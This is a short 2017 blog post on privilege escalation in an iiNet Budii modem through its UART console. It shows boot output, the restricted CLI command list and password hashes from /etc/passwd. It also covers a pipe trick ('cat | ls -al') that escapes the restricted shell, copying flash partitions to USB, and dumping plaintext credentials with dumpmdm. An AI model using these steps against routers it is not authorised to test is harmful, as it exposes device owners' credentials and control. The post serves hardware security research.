Tuesday, 16 May 2017

iiNet Budii(1031) (UART based privesc attacks)

Opening the case we find a internal usb, we can also see a altera max jtag breakout, a large set of gpio pins and a UART breakout.

connecting to the uart and booting we can see the modem is running a broadcom firmware

CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE)
Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom)
Copyright (C) 2000-2011 Broadcom Corporation.
Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz
Total Memory: 134217728 bytes (128MB)
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel

the user names available to us are:

upon logging in we are brought into a console(d), the commands available to admin are :

help           logout      exit       quit     reboot       adsl       
xdslctl           xtm      brctl      cat     loglevel       logdest
virtualserver  ddns      df    dumpcfg   dumpmdm   meminfo
psp   kill    dnsproxy    syslog    echo  ifconfig   ping
ps    pwd        sntp     sysinfo      tftp   voice
wlctl wifidefault arp defaultgateway  dhcpserver  dns
endbg dac3120_dbg cpld_led  lan  lanhosts   passwd  ppp
restoredefault  route save  swversion  cfgupdate  swupdate
exitOnIdle  wan  7sl  factoryrestore  factorywifi sysreport
 audiotest   usbinfo  zigbeetest  stopzigbee  initzigbee

The user account is slightly less privileged than the admin.

a quick cat of etc/passwd or var/passwd gives us:

support:tByR37W8BPs8g:0:0:Technical Support:/:/bin/sh                          
user:hfO9hSymQzRIQ:0:0:Normal User:/:/bin/sh                                   
nobody:FpbmJjv2tUjNk:0:0:nobody for ftp:/:/bin/sh                              

the passwords are all UN=PW expect for iinetbob.(pword unknown)

Ok so bobs pword is supposed to be super long and i don't have it so i need more access, to see the file system..

We use a pipe | on cat or ping really anything will work at this point just that cat is cleaner

so we use :\

>cat | ls -al

Because the second command is not bound to console(d) we can use all of
the busy box/sh/ash command set but after the command we are returned to the console(d)

by inserting a usb into the internal port we can simply cp out the files we need

>cat | cp "/dev/mtd0" "/dev/mtd1" "/dev/mtd2" "/dev/mtd3" > (your drive)

Looking into the console(d) routines and its links to {lib file:libcms_cli}
 we find a table of hiddencmds
 one of them more interesting than others:

# DATA XREF: .data:cliHiddenCmdTable o


this command breaks out of console(d) without killing the supervisors (smd&ssk)
we can always use the cat trick and break into sh but it sometimes fouls the smd control.

the command can be used in both the user account and the admin account so if in theory the routers admin was locked we could use the user account and privesc commands to gain a high level access.

We are still very limited as too how far we can swing inside the commands as the smd and ssk respond to alot of the actions placed across the userland  (telnet & ssh)

The config files can be dumped via  >dumpmdm or dumpconfig

which will also dump the users and passwords with no encoding/hashes

<AdditionalHardwareVersion>BoardId=GGDV711_iiNet</AdditionalHardwareVersion>   <X_BROADCOM_COM_LoginCfg>

Till Next Time.

No comments:

Post a Comment